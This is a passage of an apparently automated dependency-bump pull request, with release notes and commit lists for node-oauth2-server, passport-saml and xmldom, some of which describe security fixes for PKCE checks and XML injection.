href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/385\"\u003enode-oauth/node-oauth2-server#385\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump chai from 4.5.0 to 6.2.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/386\"\u003enode-oauth/node-oauth2-server#386\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/upload-pages-artifact from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/392\"\u003enode-oauth/node-oauth2-server#392\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/setup-node from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/393\"\u003enode-oauth/node-oauth2-server#393\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/configure-pages from 4 to 5 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/394\"\u003enode-oauth/node-oauth2-server#394\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/checkout from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/395\"\u003enode-oauth/node-oauth2-server#395\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump lodash from 4.17.21 to 4.17.23 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/396\"\u003enode-oauth/node-oauth2-server#396\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump vitepress from 2.0.0-alpha.15 to 2.0.0-alpha.16 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/401\"\u003enode-oauth/node-oauth2-server#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump minimatch by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/407\"\u003enode-oauth/node-oauth2-server#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump rollup from 4.54.0 to 4.59.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/408\"\u003enode-oauth/node-oauth2-server#408\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump sinon from 21.0.1 to 21.0.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/413\"\u003enode-oauth/node-oauth2-server#413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump nyc from 17.1.0 to 18.0.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/406\"\u003enode-oauth/node-oauth2-server#406\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps): bump actions/configure-pages from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/420\"\u003enode-oauth/node-oauth2-server#420\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003ebuild(deps-dev): bump handlebars from 4.7.8 to 4.7.9 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/pull/419\"\u003enode-oauth/node-oauth2-server#419\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/compare/v5.2.1...v5.3.0\"\u003ehttps://github.com/node-oauth/node-oauth2-server/compare/v5.2.1...v5.3.0\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/cc70455a9496b184fd0caaadd79ba4b4002eb4c9\"\u003e\u003ccode\u003ecc70455\u003c/code\u003e\u003c/a\u003e fix(deps): update package-lock after bumping package version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/ef467c96b6db7b1a7f4177b54553e255e8cbfaae\"\u003e\u003ccode\u003eef467c9\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/8a35509617c70435dbae9386d40eeb148ff7a4aa\"\u003e\u003ccode\u003e8a35509\u003c/code\u003e\u003c/a\u003e publish 5.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/fe22982eeac064ccca0160925150c27378d5a38d\"\u003e\u003ccode\u003efe22982\u003c/code\u003e\u003c/a\u003e fix: always perform timing safe euqal check on PKCE challenge\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/e2fcac475a1ee81b7e9aeff37f4a97ceda2811a8\"\u003e\u003ccode\u003ee2fcac4\u003c/code\u003e\u003c/a\u003e fix: cover thrown errors in PKCE tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/2d0659fc2a339d50444dc9415c51a2fc984c160f\"\u003e\u003ccode\u003e2d0659f\u003c/code\u003e\u003c/a\u003e fix: multiple PKCE vulnerabilities addressed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/79b7cf568a91acfe1dc9538eb0f9435287ecb3d3\"\u003e\u003ccode\u003e79b7cf5\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/issues/419\"\u003e#419\u003c/a\u003e from node-oauth/dependabot/npm_and_yarn/handlebars-4.7.9\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/a9c602898304d9db493f1723c57c38c66a9e225a\"\u003e\u003ccode\u003ea9c6028\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/node-oauth/node-oauth2-server/issues/420\"\u003e#420\u003c/a\u003e from node-oauth/dependabot/github_actions/actions/con...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/8b54e5bae4e69556a2b4e21dac9dcad311754be8\"\u003e\u003ccode\u003e8b54e5b\u003c/code\u003e\u003c/a\u003e build(deps): bump actions/configure-pages from 5 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-oauth/node-oauth2-server/commit/ba80c3bdab47bbc5c0d88119d7ce77c4e0d2404a\"\u003e\u003ccode\u003eba80c3b\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump handlebars from 4.7.8 to 4.7.9\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/node-oauth/node-oauth2-server/compare/v5.1.0...v5.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@node-saml/passport-saml` from 4.0.4 to 5.1.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/node-saml/passport-saml/releases\"\u003e@​node-saml/passport-saml's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.1.0\u003c/h2\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRevert \u003ccode\u003erelease-it\u003c/code\u003e for Node@18 compatibility \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/962\"\u003e#962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate minor dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/961\"\u003e#961\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e📚 Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Sponsor information - Stytch \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/960\"\u003e#960\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e⚙️ Technical Tasks\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eLint \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/954\"\u003e#954\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.0.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate node-saml/xml-crypto to address CVE (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/953\"\u003e#953\u003c/a\u003e) (4486ac9)\u003c/li\u003e\n\u003cli\u003eLint (113412a)\u003c/li\u003e\n\u003cli\u003eUpdate README.md to reflect updated node-saml (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/945\"\u003e#945\u003c/a\u003e) (a9df549)\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/902\"\u003e#902\u003c/a\u003e) (a1f973f)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.0.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate nested dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/898\"\u003e#898\u003c/a\u003e) (53d7a0d)\u003c/li\u003e\n\u003cli\u003eUpdate prettier (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/897\"\u003e#897\u003c/a\u003e) (b44b581)\u003c/li\u003e\n\u003cli\u003eUpdate major versions of dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/896\"\u003e#896\u003c/a\u003e) (65c74bd)\u003c/li\u003e\n\u003cli\u003eUpdate minor dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/895\"\u003e#895\u003c/a\u003e) (d7e7e6b)\u003c/li\u003e\n\u003cli\u003eUpdate to \u003ccode\u003e@​node-saml/node-saml\u003c/code\u003e v5 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/894\"\u003e#894\u003c/a\u003e) (fba0b16)\u003c/li\u003e\n\u003cli\u003eUpdate to Node 18 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/893\"\u003e#893\u003c/a\u003e) (fac7993)\u003c/li\u003e\n\u003cli\u003eFix circular references \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/879\"\u003e#879\u003c/a\u003e (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/880\"\u003e#880\u003c/a\u003e) (a06ff72)\u003c/li\u003e\n\u003cli\u003eStrategyOptionsCallback shouldn't have to pass all SAML options (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/838\"\u003e#838\u003c/a\u003e) (430d94e)\u003c/li\u003e\n\u003cli\u003eFix README to require correct module name (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/884\"\u003e#884\u003c/a\u003e) (eacbbbb)\u003c/li\u003e\n\u003cli\u003eUpdate README to point to \u003ccode\u003enode-saml\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/886\"\u003e#886\u003c/a\u003e) (30b1478)\u003c/li\u003e\n\u003cli\u003eAdjust type enforcement to remove warnings (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/889\"\u003e#889\u003c/a\u003e) (2389a5e)\u003c/li\u003e\n\u003cli\u003eUpdate \u003ccode\u003epackage.json\u003c/code\u003e script to mirror \u003ccode\u003enode-saml\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/888\"\u003e#888\u003c/a\u003e) (cf541a5)\u003c/li\u003e\n\u003cli\u003eRemove unused \u003ccode\u003eAuthorizeOptions\u003c/code\u003e type (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/887\"\u003e#887\u003c/a\u003e) (f574901)\u003c/li\u003e\n\u003cli\u003eClarify SLO support in \u003ccode\u003epassport-saml\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/862\"\u003e#862\u003c/a\u003e) (0e34bc8)\u003c/li\u003e\n\u003cli\u003eAdd bot to close stale issues (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/864\"\u003e#864\u003c/a\u003e) (96f49d2)\u003c/li\u003e\n\u003cli\u003eClean up types (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/813\"\u003e#813\u003c/a\u003e) (930082a)\u003c/li\u003e\n\u003cli\u003eRoll-up changelog entries for beta releases (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/867\"\u003e#867\u003c/a\u003e) (a14f25a)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/node-saml/passport-saml/blob/master/CHANGELOG.md\"\u003e@​node-saml/passport-saml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e5.1.0 (2025-07-24)\u003c/h2\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eRevert \u003ccode\u003erelease-it\u003c/code\u003e for Node@18 compatibility \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/962\"\u003e#962\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate minor dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/961\"\u003e#961\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e📚 Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate Sponsor information - Stytch \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/960\"\u003e#960\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e⚙️ Technical Tasks\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eLint \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/954\"\u003e#954\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003ev5.0.1 (2025-03-14)\u003c/h2\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003cstrong\u003egithub_actions\u003c/strong\u003e] Bump github/codeql-action from 2 to 3 \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/902\"\u003e#902\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e🐛 Bug Fixes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e[\u003cstrong\u003esecurity\u003c/strong\u003e] Update node-saml/xml-crypto to address CVE \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/953\"\u003e#953\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e📚 Documentation\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate README.md to reflect updated node-saml \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/945\"\u003e#945\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr /\u003e\n\u003ch2\u003ev5.0.0 (2024-03-27)\u003c/h2\u003e\n\u003ch4\u003e💣 Major Changes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate major versions of dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/896\"\u003e#896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate to \u003ccode\u003e@​node-saml/node-saml\u003c/code\u003e v5 \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/894\"\u003e#894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate to Node 18 \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/893\"\u003e#893\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClean up types \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/813\"\u003e#813\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e🚀 Minor Changes\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate minor dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/895\"\u003e#895\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e🔗 Dependencies\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate nested dependencies \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/898\"\u003e#898\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate prettier \u003ca href=\"https://redirect.github.com/node-saml/passport-saml/pull/897\"\u003e#897\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/9fcf3d2408438d2242cd26dece977cae9f79d333\"\u003e\u003ccode\u003e9fcf3d2\u003c/code\u003e\u003c/a\u003e Release 5.1.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/f4b30092d5f5dae1760ab924b0d741d3b2904e9f\"\u003e\u003ccode\u003ef4b3009\u003c/code\u003e\u003c/a\u003e Revert \u003ccode\u003erelease-it\u003c/code\u003e for Node@18 compatibility (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/962\"\u003e#962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/a9b1bd100cfd625556402154f3d9d3eab0c7bdb8\"\u003e\u003ccode\u003ea9b1bd1\u003c/code\u003e\u003c/a\u003e Update minor dependencies (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/961\"\u003e#961\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/756d1732a3102a18ad24fb9e4ab42300e4cb9291\"\u003e\u003ccode\u003e756d173\u003c/code\u003e\u003c/a\u003e Update Sponsor information - Stytch (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/960\"\u003e#960\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/61783e29237cbde09c8dd2495ea26c8dd9551fd0\"\u003e\u003ccode\u003e61783e2\u003c/code\u003e\u003c/a\u003e Lint (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/954\"\u003e#954\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/100bd17eff3a3dd89cb8d29f0a9d4cbe8de21ca1\"\u003e\u003ccode\u003e100bd17\u003c/code\u003e\u003c/a\u003e Release 5.0.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/4486ac90f957114bb9578c5a88a52a6e23c84801\"\u003e\u003ccode\u003e4486ac9\u003c/code\u003e\u003c/a\u003e Update node-saml/xml-crypto to address CVE (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/953\"\u003e#953\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/113412a096486823d010f1f494df1bdf87f9cbf8\"\u003e\u003ccode\u003e113412a\u003c/code\u003e\u003c/a\u003e Lint\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/a9df5493b4ca3b1ba94a47e54df20276f26e6f82\"\u003e\u003ccode\u003ea9df549\u003c/code\u003e\u003c/a\u003e Update README.md to reflect updated node-saml (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/945\"\u003e#945\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/node-saml/passport-saml/commit/a1f973fb9c80af9bfdb93153b591855d15d3ffd8\"\u003e\u003ccode\u003ea1f973f\u003c/code\u003e\u003c/a\u003e Bump github/codeql-action from 2 to 3 (\u003ca href=\"https://redirect.github.com/node-saml/passport-saml/issues/902\"\u003e#902\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/node-saml/passport-saml/compare/v4.0.4...v5.1.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@xmldom/xmldom` from 0.7.13 to 0.8.13\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/xmldom/xmldom/releases\"\u003e@​xmldom/xmldom's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e0.8.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.12...0.8.13\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e (and \u003ccode\u003eNode.toString()\u003c/code\u003e, \u003ccode\u003eNodeList.toString()\u003c/code\u003e) now accept a \u003ccode\u003erequireWellFormed\u003c/code\u003e option (fourth argument, after \u003ccode\u003eisHtml\u003c/code\u003e and \u003ccode\u003enodeFilter\u003c/code\u003e). When \u003ccode\u003e{ requireWellFormed: true }\u003c/code\u003e is passed, the serializer throws \u003ccode\u003eInvalidStateError\u003c/code\u003e for injection-prone node content, preventing XML injection via attacker-controlled node data. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-j759-j44w-7fr8\"\u003e\u003ccode\u003eGHSA-j759-j44w-7fr8\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-x6wf-f3px-wcqx\"\u003e\u003ccode\u003eGHSA-x6wf-f3px-wcqx\u003c/code\u003e\u003c/a\u003e \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-f6ww-3ggp-fr8h\"\u003e\u003ccode\u003eGHSA-f6ww-3ggp-fr8h\u003c/code\u003e\u003c/a\u003e\n\u003cul\u003e\n\u003cli\u003eComment: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e--\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eProcessingInstruction: throws when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e?\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eDocumentType: throws when \u003ccode\u003epublicId\u003c/code\u003e fails \u003ccode\u003ePubidLiteral\u003c/code\u003e, \u003ccode\u003esystemId\u003c/code\u003e fails \u003ccode\u003eSystemLiteral\u003c/code\u003e, or \u003ccode\u003einternalSubset\u003c/code\u003e contains \u003ccode\u003e]\u0026gt;\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eSecurity: DOM traversal operations (\u003ccode\u003eXMLSerializer.serializeToString()\u003c/code\u003e, \u003ccode\u003eNode.prototype.normalize()\u003c/code\u003e, \u003ccode\u003eNode.prototype.cloneNode(true)\u003c/code\u003e, \u003ccode\u003eDocument.prototype.importNode(node, true)\u003c/code\u003e, \u003ccode\u003enode.textContent\u003c/code\u003e getter, \u003ccode\u003egetElementsByTagName()\u003c/code\u003e / \u003ccode\u003egetElementsByTagNameNS()\u003c/code\u003e / \u003ccode\u003egetElementsByClassName()\u003c/code\u003e / \u003ccode\u003egetElementById()\u003c/code\u003e) are now iterative. Previously, deeply nested DOM trees would exhaust the JavaScript call stack and throw an unrecoverable \u003ccode\u003eRangeError\u003c/code\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-2v35-w6hq-6mfw\"\u003e\u003ccode\u003eGHSA-2v35-w6hq-6mfw\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThank you,\n\u003ca href=\"https://github.com/Jvr2022\"\u003e\u003ccode\u003e@​Jvr2022\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/praveen-kv\"\u003e\u003ccode\u003e@​praveen-kv\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/decsecre583\"\u003e\u003ccode\u003e@​decsecre583\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/tlsbollei\"\u003e\u003ccode\u003e@​tlsbollei\u003c/code\u003e\u003c/a\u003e,\n\u003ca href=\"https://github.com/KarimTantawey\"\u003e\u003ccode\u003e@​KarimTantawey\u003c/code\u003e\u003c/a\u003e,\nfor your contributions\u003c/p\u003e\n\u003ch2\u003e0.8.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/xmldom/xmldom/compare/0.8.11...0.8.12\"\u003eCommits\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003epreserve trailing whitespace in ProcessingInstruction data \u003ca href=\"https://redirect.github.com/xmldom/xmldom/pull/962\"\u003e\u003ccode\u003e[#962](https://github.com/xmldom/xmldom/issues/962)\u003c/code\u003e\u003c/a\u003e / \u003ca href=\"https://redirect.github.com/xmldom/xmldom/issues/42\"\u003e\u003ccode\u003e[#42](https://github.com/xmldom/xmldom/issues/42)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003ecreateCDATASection\u003c/code\u003e now throws \u003ccode\u003eInvalidCharacterError\u003c/code\u003e when \u003ccode\u003edata\u003c/code\u003e contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e, as required by the \u003ca href=\"https://dom.spec.whatwg.org/#dom-document-createcdatasection\"\u003eWHATWG DOM spec\u003c/a\u003e. \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSecurity: \u003ccode\u003eXMLSerializer\u003c/code\u003e now splits CDATASection nodes whose data contains \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e into adjacent CDATA sections at serialization time, preventing XML injection via mutation methods (\u003ccode\u003eappendData\u003c/code\u003e, \u003ccode\u003ereplaceData\u003c/code\u003e, \u003ccode\u003e.data =\u003c/code\u003e, \u003ccode\u003e.textContent =\u003c/code\u003e). \u003ca href=\"https://github.com/xmldom/xmldom/security/advisories/GHSA-wh4c-j3r5-mjhp\"\u003e\u003ccode\u003eGHSA-wh4c-j3r5-mjhp\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eCode that passes a string containing \u003ccode\u003e\u0026quot;]]\u0026gt;\u0026quot;\u003c/code\u003e to \u003ccode\u003ecreateCDATASection\u003c/code\u003e and relied on the previously unsafe 